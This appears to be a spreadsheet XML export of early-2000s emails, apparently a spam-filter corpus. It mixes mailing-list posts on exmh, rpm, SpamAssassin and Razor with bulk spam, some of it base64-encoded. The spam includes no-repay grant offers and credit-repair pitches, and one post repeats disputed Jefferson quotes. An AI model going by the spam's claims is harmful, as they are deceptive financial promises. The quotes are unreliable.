 bWU8L2I+IG1pbnV0ZXMgYW5kIDxiPkV2ZW5pbmcvV2Vla2VuZHM8L2I+PGJy
 Pg0KJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7
 Jm5ic3A7Jm5ic3A7IA0KUHJvZ3JhbXMgc3RhcnRpbmcgYXMgTG93IGFzIDxi
 PiQzMC9tb250aDwvYj48YnI+PGJyPg0KJm5ic3A7Jm5ic3A7Jm5ic3A7PEZP
 TlQgY29sb3I9IzAwMDBmZiBmYWNlPVdpbmdkaW5ncyBzaXplPTM+KDwvRk9O
 VD4mbmJzcDsmbmJzcDsNCjxiPjMtV2F5PC9iPiBhbmQgQ29uZmVyZW5jZSBD
 YWxsaW5nIGluY2x1ZGVkPGJyPjxicj4NCiZuYnNwOyZuYnNwOyZuYnNwOzxG
 T05UIGNvbG9yPSMwMDAwZmYgZmFjZT1XaW5nZGluZ3Mgc2l6ZT0zPig8L0ZP
 TlQ+Jm5ic3A7Jm5ic3A7DQo8Yj5ObzwvYj4gR2ltbWlja3MsIERlcG9zaXRz
 LCBDb250cmFjdHMsIG9yIENyZWRpdCBDaGVja3M8YnI+PGJyPg0KJm5ic3A7
 Jm5ic3A7Jm5ic3A7PEZPTlQgY29sb3I9IzAwMDBmZiBmYWNlPVdpbmdkaW5n
 cyBzaXplPTM+KDwvRk9OVD4mbmJzcDsmbmJzcDsNCkdldCA8Yj5GUkVFPC9i
 PiBMaWZldGltZSBTZXJ2aWNlIG9yIEhpZ2ggTGV2ZWxzIG9mPGJyPg0KJm5i
 c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7
 Jm5ic3A7ICAgIA0KPGI+SU5DT01FPC9iPiB3aXRoIG91ciA8ST5SZWZlcnJh
 bCBQcm9ncmFtPC9JPjxicj48YnI+DQpUaGlzIGlzIGEgPGI+SGlnaCBRdWFs
 aXR5PC9iPiBhbmQgPGI+RGVwZW5kYWJsZTwvYj4gTEQgc2VydmljZSB0aGF0
 IGFsc28gb2ZmZXJzPGJyPg0KYSBncmVhdCBzdXBwb3J0IHN5c3RlbSBmb3Ig
 YnVpbGRpbmcgYSBsdWNyYXRpdmUgaG9tZSBidXNpbmVzcyBlaXRoZXI8YnI+
 DQpvbiBJbnRlcm5ldCBvciBvZmYtbGluZSB3aXRoIFZFUlkgaGlnaCBkZW1h
 bmQgcHJvZHVjdHMhPEJSPg0KPGJyPg0KPEZPTlQgc2l6ZT0zIGZvbnQgY29s
 b3I9IiNmZjAwMDAiPjxiPkZvciBNb3JlIEluZm9ybWF0aW9uIC4gLiAuIC4g
 PC9iPjwvRk9OVD48YnI+PGJyPg0KV2l0aCBtYW55IGRpZmZlcmVudCBJbnRl
 cm5ldCBBZHMsIEkgbXVzdCB2ZXJpZnkgZ2VudWluZSBJbnRlcmVzdCwgc28u
 Li4uLjxicj4NCmZvciBkZXRhaWxzLCBwbGVhc2UgdXNlIHRoaXMgbGluayBh
 bmQgPHU+dGVsbCBtZSB5b3UgYXJlIGludGVyZXN0ZWQ8L3U+Ojxicj48YnI+
 DQombmJzcDsmbmJzcDsmbmJzcDsmbmJzcDs8Rk9OVCBzaXplPTIuNSBmb250
 PjxiPjxBIGhyZWY9Im1haWx0bzpGbGF0c2F2MTEyQGV4Y2l0ZS5jb20/U3Vi
 amVjdD1TRU5EX01PUkVfSU5GTyI+PGZvbnQgY29sb3I9IiNmZjAwMDAiPiZs
 dDtJJ00gSU5URVJFU1RFRCZndDs8L2ZvbnQ+PC9BPjwvYj48L2ZvbnQ+PGJy
 Pg0KPGJyPg0KJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PEZPTlQgY29sb3I9
 IiMwMDAwMDAiIHNpemU9Mj4oTm90ZTogcGxlYXNlIDxiPkRvIE5PVDwvYj4g
 c2ltcGx5IHVzZSBSZXBseSAtIEkgd29uJ3QgZ2V0IHlvdXIgbWVzc2FnZSk8
 YnI+PGJyPg0KKiAqICogKiAqICogKiAqICogKiAqICogKiAqICogKiAqICog
 KiAqICogKiAqICogKiAqICogKiAqICogKiAqICogKiAqICogKiAqICogKjwv
 Zm9udD48YnI+DQo8Rk9OVCBjb2xvcj0iIzAwMDAwMCIgc2l6ZT0yPjxiPlRI
 SVMgTUVTU0FHRSBJUyBBRFZFUlRJU0VEIElOIE1BTlkgV0FZUzwvYj4sIHNv
 IGlmIGl0PGJyPg0KZG9lc24ndCBpbnRlcmVzdCB5b3UsIHlvdSBjYW4gaW5z
 dXJlIHlvdSB3b24ndCBnZXQgZnV0dXJlIGVtYWlsczxicj4NCmJ5IHVzaW5n
 IHRoaXMgbGluazogPGI+PGZvbnQgY29sb3I9IiMwMDAwZmYiPiA8L2ZvbnQ+
 PC9iPjxiPjxBIGhyZWY9Im1haWx0bzp1bnN1YnNjcjExMkBleGNpdGUuY29t
 P1N1YmplY3Q9U0VORF9OT19NQUlMIj5OTyBFTUFJTFM8L0E+PC9iPjxicj4N
 CjwvRk9OVD48L2Rpdj4NCjxicj4NCjxGT05UIHNpemU9MT4gPGZvbnQgY29s
 b3I9IiNGRkZGRkYiPjkyOTZ3Q09YNi02OTRHVHhKNjkyMnRqVnUxLTQ1NHNs
 QDMwPC9mb250Pg0KPC9UUj4NCjwvSFRNTD4NCg==
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [vox] Founding Fathers on Religion
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Some interesting quotes...
 http://www.postfun.com/pfp/worbois.html
 Thomas Jefferson:
 "I have examined all the known superstitions of the word, and I do not
 find in our particular superstition of Christianity one redeeming feature.
 They are all alike founded on fables and mythology. Millions of innocent
 men, women and children, since the introduction of Christianity, have been
 burnt, tortured, fined and imprisoned. What has been the effect of this
 coercion? To make one half the world fools and the other half hypocrites;
 to support roguery and error all over the earth."
 SIX HISTORIC AMERICANS,
 by John E. Remsburg, letter to William Short
 Jefferson again:
 "Christianity...(has become) the most perverted system that ever shone on
 man. ...Rogueries, absurdities and untruths were perpetrated upon the
 teachings of Jesus by a large band of dupes and importers led by Paul, the
 first great corrupter of the teaching of Jesus."
</t>
  </si>
  <si>
    <t xml:space="preserve">MF&gt; Here is a sample conversation on (MSN Messenger with 'SmarterChild'):
 MF&gt; Mike says:
 MF&gt; how are you?
 MF&gt; SmarterChild says:
 MF&gt; Great thx! You?
 Oh freaking great.  In their adoption to make it 'more human' they
 have to add in all the broken english and shortened AOL-style
 phrasings.  YAY.
 Next thing you know, the AI will be asking for ASL...
 Evil.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 19 Sep 2002, Bill Stoddard wrote:
 --]Good points all but they don't apply in this case.  Someone is speaking and
 --]a group of selfish bastards only interested in getting their rocks off are
 --]trying to shout him down (they are doing it because 'it's good for the
 --]soul'. Kind like Chuckie Manson doing the stuff he did cause 'it was good
 --]for his soul'). Unprincipled and evil. It's got nothing to do with throwing
 --]tea in the harbor or the DoI.
 History is written by the victors. If the rabble can put forth there ideas
 they will be tempered in the pages of yore as "strong willed voices
 decrying the obvious injustices of the day"
 Once again, look at the Chicago 7, a loud and rude a crowd of selfish
 pricks as you were want to find in the day. History of course colors them
 with times great blur filter. The jagged bits that , at the time, were
 called rude and obnoxious are now seen as a stab of justive doing in the
 sideof the ill pathed goverment.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] My SA went crazy.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Jesus Climent said:
 &gt; d output: Bareword found where operator expected at (eval 11) line 95,
 &gt; near "25FREEMEGS_URL_uri_test"  (Missing operator before
 &gt; FREEMEGS_URL_uri_test?) Bareword found whe
 &gt; Is that a bug or is a fault in my system?
 looks like there's an out-of-date copy of the rules files, on your system.
 that rules is called "FREEMEGS_URL" nowadays.
 --j.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</si>
  <si>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From
</t>
  </si>
  <si>
    <t xml:space="preserve">
 When I receive a message that has a line starting with "From ", it's
 broken into two messages.  I get my mail from /var/spool/mail.  The
 program that incorporates mail thinks that the "From " line starts a new
 message.
 My sysadmins have told me that the sending mail client is supposed to 
 escape lines begining with "From ".  EXMH (2.5) doesn't do this.  Should 
 it?  It appears that my MH is MH 6.8.  Does NMH fix this?
 Jason D. M. Rennie
 MIT AI Lab
 jrennie@ai.mit.edu
 (617) 253-5339
 http://www.ai.mit.edu/~jrennie/
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Save the planet, kill the people
</t>
  </si>
  <si>
    <t xml:space="preserve">the latest -
 http://news.bbc.co.uk/1/hi/world/africa/2240487.stm
 Friday, 6 September, 2002, 08:53 GMT 09:53 UK
 Zimbabwe eases GM stance
 Zimbabwe has dropped objections to accepting genetically modified (GM) grain
 so that urgently-needed food aid can be delivered, says the UN food agency.
 The executive director of the World Food Programme, James Morris, said
 Zimbabwe's decision would send an important message to other countries in
 the region which have refused food aid because it might contain GM grain.
 Until now, Zimbabwe had said it would only allow aid workers to distribute
 ground maize to allay fears that GM grain could be planted.
 But a Zimbabwean minister says the government has now set up a system of
 checks to ensure the grain will not enter the eco-system.
 There have been fears that Southern African nations could lose lucrative
 export markets in Europe if they cannot certify that their crops are
 GM-free.
 Aid
 Mr Morris announced the policy reversal after talks in Harare with
 Zimbabwean President Robert Mugabe.
 "The fact that they have now concluded that they are comfortable in
 accepting GM crops or commodities will be an important signal to other
 countries in the region," Mr Morris told journalists.
 "It will enable us to do our job," he said.
 Aid workers say up to 13 million people in seven countries in Southern
 Africa face famine. In Zimbabwe which was once the bread basket of the
 region, some six million people are estimated to need food aid.
 The WFP says it already has aid pledges for about half of the 600,000 tonnes
 of food it intends to bring into Zimbabwe in the next few months.
 The government blames the shortages solely on drought, but the government's
 campaign to transfer land from large scale commercial white farmers has
 worsened the situation, say many donors.
 Lost markets
 The GM row has complicated relief efforts across the region.
 Zambia's president is refusing to overturn his ban on GM food aid, labelling
 it as 'poison' .
 Deals to mill GM food before being distributed, so that it could not be
 planted, have placated fears in Malawi and Mozambique.
 United States aid officials deny that the food is unsafe, pointing out that
 Americans eat GM maize every day.
 The World Health Organisation has certified the grain for human consumption
 and says it does not constitute a danger to people's health.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Looking for a more powerful website? Try GeoCities for $8.95 per month.
 Register your domain name (http://your-name.com). More storage! No ads!
 http://geocities.yahoo.com/ps/info
 http://us.click.yahoo.com/aHOo4D/KJoEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Do I need to do anything to recreate anything after deleting this?
 I did notice an rpm I made the other day didn't work, and just sat there 
 for ages  seemingly doing nothing, which probably did this :(
 Ok, now I get:
 Fetched 88.1kB in 2m31s (581B/s)
 error: cannot get exclusive lock on /var/lib/rpm/Packages
 error: cannot open Packages index using db3 - Operation not permitted (1)
 E: could not open RPM database:cannot open Packages index using db3 - 
 Operation not permitted (1)
 Arrrrg.
 --On Tuesday, February 05, 2002 15:06:28 +0100 Roy-Magne Mo 
 &lt;rmo@sunnmore.net&gt; wrote:
 &gt; It's not the rpm, it's the rpm-system with you. The cache seems to have
 &gt; rottened. Try removing /var/lib/rpm/__db*
                                     -- \m/ --
   "...if I seem super human I have been misunderstood." (c) Dream Theater
          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Are you a sanitary ware distributor?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --Z_MULTI_PART_MAIL_BOUNDAEY_S
 Content-Type: text/plain
 Content-Transfer-Encoding: base64
 Tm90ZTpJZiB0aGlzIGVhbWlsIGlzIG5vdCBmaXQgZm9yIHlvdSxwbGVhc2UgcmVwbHkgdG8g
 d2VibWFzdGVyQHdqanp6cy5jb20gd2l0aA0KInJlbW92ZSIuDQpXZSBkb24ndCBpbnRlbmQg
 dG8gc2VuZCBzcGFtIGVtYWlsIHRvIHlvdS5UaGFuayB5b3UhDQoNCkRlYXIgc2lycyBvciBN
 YWRhbXMsDQpXZSBhcmUgb25lIEFyY3lsIGJhdGh0dWIgbWFudWZhY3R1cmVyIGluIENoaW5h
 Lg0KDQotLS0tLS0tLS0tLS0tLS0tLVByb2ZpbGUtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0K
 DQpPdXIgZmFjdG9yeXNwZWNpYWxpemVzIGluIG1hbnVmYWN0dXJpbmcgobBZRU1BobEgYnJh
 bmQgYWNyeWxpYyBjb21wb3NpdGUgYmF0aHR1YnMsDQp3ZSBoYXZlIG1vcmUgdGhhbiAxMCB5
 ZWFycyBleHBlcmllbmNlIG9mIGJhdGh0dWIgbWFudWZhY3R1cmluZyBhbmQgbWFya2V0aW5n
 Lg0KV2l0aCBvdXIgY29uc2lkZXJhYmxlIGV4cGVyaWVuY2Ugd2Ugc2V0IG91dCB0byBibGVu
 ZCB0aGUgYWR2YW50YWdlcyBvZiBhbGwgdGhlIG90aGVyDQpvZiBiYXRodHVicyBvZmZlcmVk
 IGluIHRoZSBtYXJrZXQgcGxhY2UgaW50byBvbmUgcmFuZ2UuIEFmdGVyIHNldmVyYWwgeWVh
 cnMgZGV2ZWxvcG1lbnQNCndlIHByb2R1Y2VkIG91ciBjdXJyZW50IHJhbmdlIGFuZCB0aGUg
 WUVNQSBicmFuZCBiYXRodHViIHdhcyBwYXRlbnRlZCBpbiAyMDAxLiBXZSB3ZXJlDQpldmVu
 IGF3YXJkZWQgdGhlICJHb2xkIE1lZGFsIiBpbiB0aGUgIkNoaW5lc2UgUGF0ZW50IFRlY2hu
 b2xvZ3kgRXhoaWJpdGlvbiIgYW5kDQoiVGhlIE5pbnRoIENoaW5lc2UgTmV3IFBhdGVudCBU
 ZWNobm9sb2d5IGFuZCBOZXcgUGF0ZW50IFByb2R1Y3QgRXhoaWJpdGlvbiIgbGF0ZXIgdGhh
 dCB5ZWFyLg0KVGhlIFlFTUEgYmF0aHR1YnMgc3RydWN0dXJhbCBkZXNpZ24gaXMgdGhhdCBv
 ZiBhIG5vcm1hbCBhY3J5bGljIGJhdGh0dWIgYnV0IGNvbmdsdXRpbmF0ZWQNCmludG8gYSBj
 b21wb3NpdGUgbWF0ZXJpYWwuIEl0IGlzIHJpZGdlZCBhbmQgaXMgbWFkZSBtb3JlIHRoYW4g
 dHdpY2UgYXMgdGhpY2sgYXMgYSBub3JtYWwNCnVuaXQsIG1ha2luZyBpdCBtb3JlIHNtb290
 aCwgZ2VudGxlIGFuZCBlbGVnYW50LiBUaGlzIG1hbnVmYWN0dXJpbmcgdGVjaG5pcXVlIG5v
 dCBvbmx5DQpwcm92aWRlcyBhbGwgdGhlIGFkdmFudGFnZXMgb2YgYSBub3JtYWwgYWNyeWxp
 YyBiYXRodHViIChlYXNpbHkgdG8gY2xlYW4sIHJlc2lzdGFuY2UgdG8NCmRpcnQsIGNvbG9y
 ZnVsLGF0dHJhY3RpdmUgZXRjKSBidXQgYWxzbyBwcm92aWRlcyBpbmNyZWFzZWQgaGVhdCBy
 ZXRlbnRpb24sIGFuZCBleHRlbmRzDQp0aGUgcHJvZHVjdHMgbGlmZSBzcGFuLg0KDQpCZXNp
 ZGVzIG91ciBwcm9kdWN0cyBvbiB3ZWJzaXRlLCB3ZSBub3cgcHJvZHVjZSBzb21lIG5ldyBt
 b2RlbHMgZm9yIFVTQSBtYXJrZXQuDQpXZSBhbHNvIHByb2R1Y2Ugc2hvd2VyIHBhbmVscyB3
 aXRoIGZpbmVzdCBxdWFsaXR5Lg0KDQotLS0tLS0tLS0tLS0tLS0tLS0tYmF0aHR1YiBTcGVj
 aWZpY2F0aW9ucy0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KMSxXYWxsIHRoaWNrbmVzczoxMG1t
 fjIwbW0NCjIsV2VpZ2h0OiA1MH42MEtHDQoNCi0tLS0tLS0tLS0tLS0tLS0tLS1Db29wZXJh
 dGUtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQpXZSB3b3VsZCBsaWtlIHRv
 IGJlIHlvdXIgT0VNL09ETSBtYW51ZmFjdHVyZXIuDQoNCkZvciBkZXRhaWxlZCBpbmZvLCBw
 bGVhc2UgYnJvd3NlIG91ciB3ZWJzaXRlIGh0dHA6Ly93d3cud2pqenpzLmNvbQ0KDQpCZXN0
 IHdpc2hlcyBhbmQgcmVnYXJkcywNCg0KRXhwb3J0IE1hbmFnZXINCkplcnJ5IExlZQ0KTW9i
 aWxlOjEzOTUxMjI4NTYxDQpQaG9uZTowMDg2LTUxOS01MjExOTczDQpGYXg6ICAwMDg2LTUx
 OS01MjA5Nzc2DQpXdWppbiBIdWFuZ2xpIENvbXBvc2l0ZWQgU2FuaXRhcnkgRmFjdG9yeQ0K
 QWRkOkhVYW5nbGkgdG93bixXdWppbiBjb3VudHkNCiAgICBDaGFuZ3pob3UgMjEzMTUxDQog
 ICAgSmlhbmdzdSBwcm92aW5jZQ0KICAgIFAuUi5DaGluYQ0KV2Vic2llOmh0dHA6Ly93d3cu
 d2pqenpzLmNvbQ0KRW1haWw6d2pqenpzQHdqanp6cy5jb20NCg0KICAgIA==
 --Z_MULTI_PART_MAIL_BOUNDAEY_S--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Re: keep submitting known spam?
</t>
  </si>
  <si>
    <t xml:space="preserve">Craig R.Hughes wrote:
 &gt; 
 &gt; On Thursday, August 8, 2002, at 11:15  AM, Mika Hirvonen wrote:
 &gt; 
 &gt;&gt; I do not know the algorithms used to calculate confidence values, but it
 &gt;&gt; probably penalizes heavily when someone revokes spam that everyone else
 &gt;&gt; considers as spam. Or at least it should.
 &gt; 
 &gt; 
 &gt; The problem with that is that invariably, there are "gray" mails.  Some 
 &gt; people will vote "spam", others will vote "nonspam" -- under your 
 &gt; proposed system, anyone who ever calls "gray" mail nonspam will have a 
 &gt; shitty trust score.  And once you have a shitty trust score, your own 
 &gt; submissions won't even be used to flag your own spam as spam.  That's 
 &gt; bound to confuse a lot of people.  "But I just marked that exact message 
 &gt; as spam.  Why is it not being considered spam?  I'm an honest submitter."
 I assume that how much the trust goes down depends of the proportion of 
 report vs revoke. If everybody except one says that a mail is spam, the 
 one guy will see his trust go down dramatically. If you are with the 
 majority, your trust goes up. If you are against the majority, your 
 trust goes down. If people 50-50, whatever you vote, your neither 
 against the majority nor with it, so your trust won't change. So your
 "gray" mail won't have much influence on your trust (neither good nor 
 bad, just... gray)
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free $$$ For Business Or Personal cwfqt
</t>
  </si>
  <si>
    <t xml:space="preserve">START A BUSINESS OR FUND YOUR CHILD'S COLLEGE WITHOUT DEBT.
 Get the money you need and NEVER have to pay it back.
 Starting a business or putting your child through college is an expensive 
 undertaking. That's where we can Help. Our valuable ebook will 
 put you in touch with thousands of programs to help you get the money 
 you need. That's right FREE Grant &amp; Scholarship Money.
 Don't Let Someone Else Get YOUR Share!
 Reg. Price $34.95     Order by July 31 and SAVE $10.00. 
 Tour our SECURE website for more details: 
 http://www.moneyfromthetree.com/moneytree/index5.htm 
 You are receiving this special offer because you have provided permission 
 to receive third party online promotions.  To be eliminated from future marketing:
 http://www.moneyfromthetree.com/moneytree/omit.htm
 rcbvlirnuibhhejdtjdpjyogjdeyrklxvrjwo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</si>
  <si>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When an engineer flaps his wings
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/03.html#when_an_engineer_flaps_his_wings
 Date: 2002-10-03T01:31:51-05:00
 Remember that saying from chaos theory about how when a butterfly flap its 
 wings, it can cause a hurricane a month later halfway around the world? As 
 several people have already noted, Google has made some major changes in their 
 most recent update. The weblogging community was hit hard (for instance, I used 
 to be the #1 "mark"[1]; I am now #6). The changes appear to be the result of an 
 attempt to stop two phenomena: explicitly selling ads based on PageRank[2], and 
 Google bombing[3]. 
 Specifically, Google is now apparently cross-checking link text with the linked 
 site, and discounting or ignoring links whose text does not appear in the 
 linked site. This all but kills off Google bombing. Searching for "go to hell"
 [4] no longer takes you to microsoft.com[5]; searching for "talentless hack"[6] 
 no longer finds ohmessylife.com[7], although it finds a lot of people who were 
 previously participating in the Google bombing. No definitive word yet on 
 whether Google is actively penalizing such sites. 
 Unfortunately, the algorithm tweaks necessary to stop these two techniques have 
 caused a wide range of collateral damage, apparently coming down hardest on 
 medium-to-large sites that had previously been doing everything right (as far 
 as page structure, link structure, accessibility, and general honest hard work 
 putting together a usable and useful site). The Webmasterworld forums are alive 
 with complaints and speculation: 
 - New update, pagerank death?[8] 
 - September 2002 Google Update Discussion - part 1[9] 
 - Let's find out what happened - Sept 2002 Update - pt. 2[10] 
 (Side note: amongst the confusion, it has been suggested that Google is no 
 longer indexing ALT text in images. I can confirm that this is absolutely 
 false. Searching diveintomark.org for "gimli"[11] finds my entry of July 29[12]
 , where "Gimli" is mentioned only in the ALT text of an image.) 
 Regardless, Google's search results in general appear to be significantly 
 degraded in many key areas. The forums are full of people complaining that spam 
 sites, doorway pages, and obvious cloaking attempts, which Google used to be so 
 good at filtering out, are now popping up in top spots with disturbing 
 frequency. Nobody in the forums wants to talk about which keywords they're 
 tracking, so I tried to find my own concrete example of crap search results. It 
 didn't take long. 
 - Searching for reservation hotel[13] brings up an empty sub-page[14] of a 
 hotel reservation company in Italy[15] as the first result. This seems 
 unhelpful, and unlikely to be relevant to the average US-based consumer (and 
 Google absolutely knows I'm in the US based on my IP address). 
 - Searching for news observer nc[16] (the News &amp; Observer is a Raleigh, NC 
 newspaper) does find The News &amp; Observer[17], but it also finds an Internet 
 betting spam page[18] at #7 and a non-existent page[19] at #9. 
 - Searching for eminem[20] gives us two generic portal pages, a non-existent 
 site, and a site that redirects to a site that continuously redirects to itself 
 (I am not making this up). And this is just on the first page. Good thing I 
 didn't care that much about Eminem to begin with, because Google just isn't 
 that helpful. 
 Many people in the Webmasterworld forums are now suggesting that AllTheWeb.com
 [21] has better search results overall. Just as a single comparison, their 
 results for "eminem"[22] do appear to be much more relevant. Is this the 
 beginning of the end of Google's reign?
 [1]  http://www.google.com/search?q=mark
 [2]  http://www.pradnetwork.com/affiliate.htm
 [3]  http://uber.nu/2001/04/06/
 [4]  http://www.google.com/search?q=%22go+to+hell%22
 [5]  http://www.microsoft.com/
 [6]  http://www.google.com/search?q=talentless+hack
 [7]  http://www.ohmessylife.com/
 [8]  http://www.webmasterworld.com/forum3/5646.htm
 [9]  http://www.webmasterworld.com/forum3/5688.htm
 [10] http://www.webmasterworld.com/forum3/5723.htm
 [11] http://www.google.com/search?q=gimli+site%3Adiveintomark.org
 [12] http://diveintomark.org/archives/2002/07/29.html
 [13] http://www.google.com/search?q=reservation+hotel
 [14] http://www.venere.it/home/italy.html
 [15] http://www.venere.it/
 [16] http://www.google.com/search?q=news+observer+nc
 [17] http://www.news-observer.com/
 [18] http://www.linkslsgolfworld.com/king-arthur-knight-of-the-round-table.htm
 [19] http://www.nando.net/nt/nao/
 [20] http://www.google.com/search?q=eminem
 [21] http://www.alltheweb.com/
 [22] http://www.alltheweb.com/search?query=eminem
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Latest Iraq-related news
</t>
  </si>
  <si>
    <t xml:space="preserve">Just the headlines and URLs so I don't bore y'all too much....
 http://www.guardian.co.uk/Iraq/Story/0,2763,805900,00.html
 As a US Republican, I reject George Bush's illegal and
 unconstitutional plan to attack Iraq - Scott Ritter
 http://jang.com.pk/thenews/oct2002-daily/07-10-2002/world/w9.htm
 Saudi Arabia may start fingerprinting Americans
 &lt;http://news.ft.com/servlet/ContentServer?pagename=FT.com/StoryFT/FullStory&amp;c=StoryFT&amp;cid=1033848737242&gt;
 Blair warned war to oust Saddam 'illegal'
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Home Selling? Try Us!
 http://us.click.yahoo.com/QrPZMC/iTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Our men from the private sector
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572786,215/
 Date: 2002-10-05T03:05:33+01:00
 *Politics:* Government increases secondments from energy, arms and construction 
 industries, but tries to keep it dark.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Use your Computer to fix your Bad Credit.          9840
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;HEAD&gt; 
 &lt;TITLE&gt;creditfix&lt;/TITLE&gt;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OUND=3Dhttp://209.203.162.2/creditfix/email/background_arrow.gif WIDTH=3D4=
 00&gt; 
 &lt;TR&gt; 
 &lt;TD&gt;&lt;A HREF=3Dhttp://209.203.162.2/creditfix/?cid=3D1320&amp;mid=3D15000&gt;&lt;IMG =
 SRC=3Dhttp://209.203.162.2/creditfix/email/banner_email.gif BORDER=3D0&gt;&lt;/A=
 &gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://209.203.162.2/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;BR&gt; 
 &lt;A HREF=3Dhttp://209.203.162.2/creditfix/?cid=3D1320&amp;mid=3D15000&gt;&lt;img src=3D=
 http://209.203.162.2/creditfix/email/body_email.gif alt=3D"" border=3D"0"&gt;=
 &lt;/A&gt; 
 &lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D2&gt;Thank You,&lt;/FONT&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://209.203.162.2/creditfix/email/thankyou.gif&gt; 
 &lt;BR&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;TR&gt; 
 &lt;TD&gt; 
 &lt;IMG SRC=3Dhttp://209.203.162.2/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;br&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obtained from a purch=
 ased 
 list, Reference # 1320-15000.&amp;nbsp;&amp;nbsp;If you wish to unsubscribe from t=
 his list, please 
 &lt;a href=3D"http://61.172.250.143/remove/remove1.html"&gt;Click here&lt;/a&gt; and e=
 nter your 
 name into the remove box. If you have previously 
 unsubscribed and are still receiving this message, you may email our 
 &lt;a href=3D"mailto:nospamws@yahoo.com?Subject=3DAbuse Report"&gt;Abuse Control=
  Center&lt;/a&gt;, 
 or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, 
 Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt; 
 &lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://209.203.162.2/creditfix/email/line.gif&gt;&lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc. All Rights Reser=
 ved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/CENTER&gt; 
 &lt;BR&gt; 
 &lt;/BODY&gt; 
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;"Kevin Oberman" said:
  &gt; It did for me, but I am not willing to say it is not a tcl/tk issue as
  &gt; other apps seemed to work OK for cut and paste and Tk does its
  &gt; clipboard stuff a bit differently than most toolkits. So I'm not
  &gt; about to place blame. Just reporting my experience.
 One more salvo on X and cut/paste.  X specifies at least two *mechanisms*
 for cut/paste, but as usual mandates no *policy*.  Windows and Macintosh
 have a slightly different mechanism and one uniform policy.  I'm quite
 sure that Tk implements all PRIMARY and CLIPBOARD selections accurately.
 The PRIMARY selection is the one that is tied to the visible selection
 on your X display.  The CLIPBOARD selection is the one with the explicit
 Copy step, and is the same as what you have on Windows and Macintosh.
 However, exmh throws in support for the cutbuffer mechanism, which is
 another archaic mechanism supported at one point (perhaps still today)
 by versions of emacs.  Exmh has a policy that tries to unify all these
 mechanisms under one umbrella, and by all reports it is not that great.
 I would encourage folks to play with those 10 lines of code in
 Text_Selection and report what works well for them.  We may come up
 with 8 lines that work for everyone, or perhaps introduce yet another
 setting that lets folks choose between a few useful models.  Of course,
 that's an admission of policy failure, but I'm willing to do that.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</si>
  <si>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Thanks Matthias.  Actually I got all four speakers with subwoofer
 working in digital out mode with gamixer.
 (http://www1.tcnet.ne.jp/fmurata/linux/down/)
 However switching between analog and digital, I'm still baffled.  As I
 have a tuner and cassette deck hooked up to "Line In" on a SBLive! 5.1,
 which is in analog mode.  But digital out works great now!
 On Wed, 2002-08-28 at 23:26, Matthias Saou wrote:
 &gt; Once upon a time, Lance wrote :
 &gt; 
